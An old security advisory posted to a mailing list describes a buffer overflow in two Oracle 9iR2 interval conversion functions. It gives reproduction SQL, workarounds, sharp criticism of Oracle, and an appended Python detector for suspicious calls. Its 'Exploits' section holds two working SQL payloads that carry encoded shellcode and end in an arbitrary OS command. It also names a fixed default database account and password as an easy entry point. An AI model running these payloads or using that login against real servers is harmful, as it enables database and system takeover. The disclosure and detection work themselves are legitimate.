From: cesarc56 at yahoo.com (Cesar)
Subject: Oracle Database 9ir2 Interval Conversion Functions Buffer Overflow

Security Advisory

Name:  Oracle Database 9ir2 Interval Conversion Functions Buffer Overflow.
System Affected :  Oracle Database 9ir2, previous versions could be affected too.
Severity :  High 
Remote exploitable : Yes
Author:    Cesar Cerrudo.
Date:    02/05/04
Advisory Number:    CC020401


Legal Notice:

This Advisory is Copyright (c) 2003 Cesar Cerrudo.
You may distribute it unmodified and for free. You may NOT modify it and
distribute it or distribute parts of it without the author's written
permission. You may NOT use it for commercial intentions (this means
include it in vulnerabilities databases, vulnerabilities scanners, any
paid service, etc.) without the author's written permission. You are
free to use Oracle details for commercial intentions.


Disclaimer:

The information in this advisory is believed to be true though it may be
false.
The opinions expressed in this advisory are my own and not of any
company. The usual standard disclaimer applies, especially the fact that
Cesar Cerrudo is not liable for any damages caused by direct or indirect
use of the information or functionality provided by this advisory.
Cesar Cerrudo bears no responsibility for content or misuse of this
advisory or any derivatives thereof.



!!!!!!!!!!!ALERT!!!!!!!!!!!:

Oracle was contacted about these vulnerabilities, but their Security
Response Team is one of the worst that I have dealt with; they don't
care about security and they don't even follow OISafety rules (Oracle is
a member).
Because of this we have only told Oracle about a couple of bugs. I think
I won't contact them anymore, or maybe if I get a letter from Larry
Ellison asking for apologies... :).
Anyway, if Oracle spent more money on security than on marketing saying
that their products are unbreakable, everything would be different.
Right now Oracle database server and other Oracle products are some kind
of backdoor.
These vulnerabilities are just a few of the 60+ that we have identified
(yes, more than 60 issues, and most of these issues can be exploited by
any low privileged user to take complete control over the database and
probably the OS; also, for some of them there aren't any workarounds).
If you are running Oracle I recommend you start praying not to be hacked
and start complaining to Oracle to improve the quality of their products
and to release patches.

BTW: if someone from Oracle dares to say that I'm not telling the truth,
then I will probably release all the holes' information to shut their
mouths.

Some workarounds to protect your Oracle servers until maybe next year,
when Oracle probably could fix their buggy database server:

- Check package permissions and remove public permission; set minimal
  permissions that fit your needs.
- Check Directory Object permissions and remove public permission; set
  minimal permissions that fit your needs; remove Directory Objects if
  not used.
- Restrict users from directly executing PL/SQL statements on the server.
- Periodically audit users' permissions on all database objects.
- Lock users that aren't used.
- Change default passwords.
If you want automation, I really like AppDetective for Oracle:
http://www.appsecinc.com/products/appdetective/oracle/


Overview:

Oracle Database Server is one of the most used database servers in the
world. It was marketed as being unbreakable, and many people think it is
one of the most secure database servers on the market. Larry Ellison
(Oracle CEO) says that Oracle is used by NSA, CIA, Russian intelligence,
governments, etc.
(www.commonwealthclub.org/archive/96/96-03ellison-qa.html), so it must
be really secure!!!
Oracle Database Server provides two functions that can be used with
PL/SQL to convert numbers to date/time intervals; these functions have
buffer overflow vulnerabilities.



Details:

When any of these conversion functions is called with a long string as
the second parameter, a buffer overflow occurs.

To reproduce the overflow, execute the following PL/SQL:

SELECT NUMTOYMINTERVAL(1,'longstringhere') from dual;

SELECT NUMTODSINTERVAL(1,'longstringhere') from dual;



This vulnerability can be exploited by any Oracle Database user because
access to these functions can't be restricted.
Exploitation of this vulnerability allows an attacker to execute
arbitrary code; it can also be exploited to cause a DoS (denial of
service) by killing the Oracle server process. An attacker can
completely compromise the OS and database if Oracle is running on the
Windows platform, because Oracle must run under the local System account
or under an administrative account. If Oracle is running on *nix then
only the database could be compromised, because Oracle mostly runs under
the oracle user, which has restricted permissions.
Important!: Exploitation of these vulnerabilities becomes easy if Oracle
Internet Directory has been deployed, because Oracle Internet Directory
creates a database user called ODSCOMMON that has a default password
ODSCOMMON (Unbreakable???, hahaha, please take a look at this
http://igloo.its.unimelb.edu.au/Webmail/tips/msg00762.html). This
password can not be changed, so any attacker can use this user to
connect to the database and exploit these vulnerabilities.


Full tests on Oracle database 9ir2 under Microsoft Windows 2000 Server
and Linux confirm these vulnerabilities; versions running on other OS
platforms are believed to be affected too.
Previous Oracle Database Server versions could be affected by these
vulnerabilities.



Exploits:

--these exploits should work on W2K Server and WinXp,
not tested on Win2003. 
--run any command at the end of the string
SELECT
NUMTOYMINTERVAL(1,'AAAAAAAAAABBBBBBBBBBCCCCCCCCCCABCDEFGHIJKLMNOPQR'
|| 

chr(59)||chr(79)||chr(150)||chr(01)||chr(141)||chr(68)||chr(36)||chr(18)||chr(80)||chr(255)||chr(21)||chr(52)||chr(35)||chr(1

48)||chr(01)||chr(255)||chr(37)||chr(172)||chr(33)||chr(148)||chr(01)||chr(32)||'echo
ARE YOU SURE? >c:\Unbreakable.txt')  

FROM DUAL;

SELECT
NUMTODSINTERVAL(1,'AAAAAAAAAABBBBBBBBBBCCCCCCCCCCABCDEFGHIJKLMNOPQR'
|| 

chr(59)||chr(79)||chr(150)||chr(01)||chr(141)||chr(68)||chr(36)||chr(18)||chr(80)||chr(255)||chr(21)||chr(52)||chr(35)||chr(1

48)||chr(01)||chr(255)||chr(37)||chr(172)||chr(33)||chr(148)||chr(01)||chr(32)||'echo
ARE YOU SURE? >c:\Unbreakable.txt')  

FROM DUAL;



Vendor Fix:

Go to Oracle Metalink site, http://metalink.oracle.com


Vendor Contact:

Oracle was contacted and they released a fix without
telling me nor the public anything and without issuing
an alert.
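
Because access to NUMTOYMINTERVAL and NUMTODSINTERVAL can't be restricted, one defensive option is to review captured SQL text for calls whose second argument is not one of the interval units Oracle documents for these functions. The following is an added example, not part of the original advisory: the names split_args and suspicious_calls and the sample statements are constructed for illustration, and a non-literal unit (bind variable, concatenation) is flagged for review rather than treated as proof of an attack.

```python
import re
# Units Oracle documents for each function's second argument (case-insensitive).
ALLOWED_UNITS = {
    "NUMTOYMINTERVAL": {"YEAR", "MONTH"},
    "NUMTODSINTERVAL": {"DAY", "HOUR", "MINUTE", "SECOND"},
}
CALL_RE = re.compile(r"\b(NUMTOYMINTERVAL|NUMTODSINTERVAL)\s*\(", re.IGNORECASE)

def split_args(sql, start):
    """Split the argument list starting just after '(' at index start, tracking
    quotes and nested parentheses. Returns None if the call is unterminated."""
    args, buf, depth, in_quote = [], [], 0, False
    for ch in sql[start:]:
        if ch == "'":
            in_quote = not in_quote      # '' toggles twice, so it stays balanced
        elif not in_quote:
            if ch == ")" and depth == 0:
                return args + ["".join(buf).strip()]
            if ch == "," and depth == 0:
                args.append("".join(buf).strip())
                buf = []
                continue
            depth += (ch == "(") - (ch == ")")
        buf.append(ch)
    return None

def suspicious_calls(sql):
    """Return (function, reason) for each call whose unit is not a documented literal."""
    findings = []
    for m in CALL_RE.finditer(sql):
        func = m.group(1).upper()
        args = split_args(sql, m.end())
        if args is None or len(args) != 2:
            findings.append((func, "malformed call"))
            continue
        lit = re.fullmatch(r"'((?:[^']|'')*)'", args[1])
        if lit is None:
            findings.append((func, "unit is not a single string literal"))
        elif lit.group(1).strip().upper() not in ALLOWED_UNITS[func]:
            findings.append((func, "undocumented unit, %d characters" % len(lit.group(1))))
    return findings

# Constructed sample statements (not taken from a real log).
SAMPLES = [
    "SELECT NUMTOYMINTERVAL(1, 'month') FROM dual",
    "SELECT NUMTODSINTERVAL(ROUND(x, 2), 'HOUR') FROM t",
    "SELECT NUMTODSINTERVAL(1, '" + "A" * 60 + "') FROM dual",
    "SELECT NUMTOYMINTERVAL(1, 'AAAA' || chr(65)) FROM dual",
]
```

Calling suspicious_calls on each captured statement returns an empty list for the first two samples and one finding each for the last two.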



